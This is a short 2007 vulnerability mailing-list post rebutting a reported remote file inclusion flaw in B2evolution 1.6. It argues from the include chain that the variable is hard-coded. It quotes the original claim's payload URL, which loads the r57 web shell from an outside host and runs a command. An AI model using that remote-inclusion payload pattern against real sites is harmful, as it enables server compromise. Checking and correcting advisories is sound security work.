[VIM] false: B2evolution 1.6 RFi
GM darkfig
gmdarkfig at gmail.com
Sun Apr 15 12:47:23 UTC 2007
Link: http://www.securityfocus.com/archive/1/465733/30/0/threaded
Author: k4rtal[at]gmail[dot]com
Quote from the thread:
"script_path/blogs/index.php?core_subdir=http://shelladresi,.com/r57.txt?cmd=id"
Even if there was a vulnerability, RFI is not possible.
And there is no LFI.
index.php:
require_once dirname(__FILE__).'/evocore/_main.inc.php';
_main.inc.php:
require_once dirname(__FILE__).'/../conf/_config.php';
_config.php:
require_once dirname(__FILE__).'/_advanced.php';
_advanced.php:
$core_subdir = 'evocore/';
More information about the VIM
mailing list